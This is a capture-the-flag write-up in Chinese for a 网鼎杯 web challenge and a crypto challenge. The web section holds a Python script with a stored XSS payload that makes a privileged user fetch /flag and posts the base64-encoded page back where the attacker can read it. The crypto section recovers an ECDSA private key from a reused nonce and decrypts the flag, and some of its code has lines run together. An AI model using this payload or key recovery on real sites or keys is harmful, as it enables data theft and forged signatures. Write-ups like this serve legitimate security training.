个人只做了一道web一道crypto
Web02
打开赛题环境地址,是登录界面,进去后获取hash值
用户名或密码随意
我们访问到的flag界面
**
**进去后这里有个输入框测试下可以进行xss
又根据/flag提示需要boss来访问这个路径,编写脚本构造payload进行访问,字符串编码下
import requests
import base64
url = "http://0192d7154c807e048cc77bde229d02d5.o3ow.dg07.ciihw.cn:44505/"
sess = requests.session()
def login():
u = url + "login"
data = {"username": "111", "password": "111"}
r = sess.post(u, data).text
parts = r.split("content_hash is ")
if len(parts) > 1:
hashcode = parts[1].split(" ")[0]
return hashcode
else:
print("无法获取")
return None
def send(u, content):
data = {"content": content}
sess.post(u, data)
def submit(hashcode):
data = {"content_hash": hashcode}
sess.post(url + "submit", data)
def attack(tar_url):
hashcode = login()
if hashcode is not None:
content_url = url + "content/" + hashcode
payload = """<script>
function encodeBase64(str) {
return btoa(unescape(encodeURIComponent(str)));
}
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4) {
if (xmlhttp.status == 200) {
var data = xmlhttp.responseText;
var formData = "content={{{ " + encodeBase64(data) + " }}}";
var postRequest = new XMLHttpRequest();
postRequest.open("POST", '/content/""" + hashcode + """', true);
postRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
postRequest.send(formData);
} else {
console.error("请求失败,状态码:" + xmlhttp.status);
}
}
};
xmlhttp.open("GET", '""" + tar_url + """', true);
xmlhttp.send();
</script>"""
send(content_url, payload)
submit(hashcode)
r = sess.get(content_url).text
print(base64.b64decode(r.split('{{{')[2].split('}}}')[0]).decode('utf-8'))
else:
print("错误")
attack("/flag")
Crypto02
求k再求私钥dA
from Crypto.Util.number import inverse
def calculate_private_key(r, s, z, k, n):
# 计算 dA
dA = (s * k - z) * inverse(r, n) % n
return dA
def solve_k(r1, s1, z1, r2, s2, z2, n):
if r1 != r2:
raise ValueError("r1 and r2 must be equal for this calculation.")
# 计算 k
k = (z1 - z2) * inverse(s1 - s2, n) % n
return k
# 示例参数
r1 = r2 = 86806104739558095745988469033305523200538774705708894815836887970976487278764
s1 = 93400851884262731807098055393482657423555590196362184363643455285862566867372
s2 = 58741027521216057788923508334695668250013849866589902683641825341545919891746
z1 = 47591695289461307212638536234394543297527537576682980326526736956079807805586
z2 = 97911075901954715147720917205165523174582665086645698292621371632896283314804
n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
# 计算 k
k = solve_k(r1, s1, z1, r2, s2, z2, n)
print("Calculated k:", k)
dA = calculate_private_key(r1, s1, z1, k, n)
print("Calculated private key dA:", dA)
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import binascii
from hashlib import sha256
from Crypto.Util.number import long_to_bytes
def victory_decrypt(ciphertext, key):
key = key.upper()
key_length = len(key)
decrypted_text = '' for i, char in enumerate(ciphertext):
if char.isalpha():
shift = ord(key[i % key_length]) - ord('A')
decrypted_char = chr((ord(char) - ord('A') - shift) % 26 + ord('A'))
decrypted_text += decrypted_char else:
decrypted_text += char return decrypted_text
k = 63798824842723164429892393608335531988404086411454158738633193887718671554477
dA = 113325324311290226461153848696856402570195717371047126863421346949577865198739 # 你
的 dA 值
victory_key = "WANGDINGCUP"
encrypted_flag_hex =
'86cd24e2914c0c4d9b87bea34005a98bd8587d14cae71909b917679d3328304e7915e6ba4cad1096faa4a85
bc52f8056d3f21ef09516be8a5160f1b338a6b936' # 提取 IV 和密文
encrypted_flag_bytes = binascii.unhexlify(encrypted_flag_hex)
iv = encrypted_flag_bytes[:16] # AES 块大小为 16 字节
encrypted_flag = encrypted_flag_bytes[16:]
# 计算 AES 密钥
key = sha256(long_to_bytes(dA)).digest()
# 解密
try:
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_encrypted_flag = unpad(cipher.decrypt(encrypted_flag), AES.block_size).decode('utf-8')
print("解密的 victory_encrypted_flag:", decrypted_encrypted_flag)
# 解密 flag
decrypted_flag = victory_decrypt(decrypted_encrypted_flag, victory_key)
print("解密出的 flag:", decrypted_flag)
except ValueError as e:
print("解密错误:", e)
标签:decrypted,encrypted,dA,content,flag,key,网鼎杯
From: https://www.cnblogs.com/1nnya/p/18516400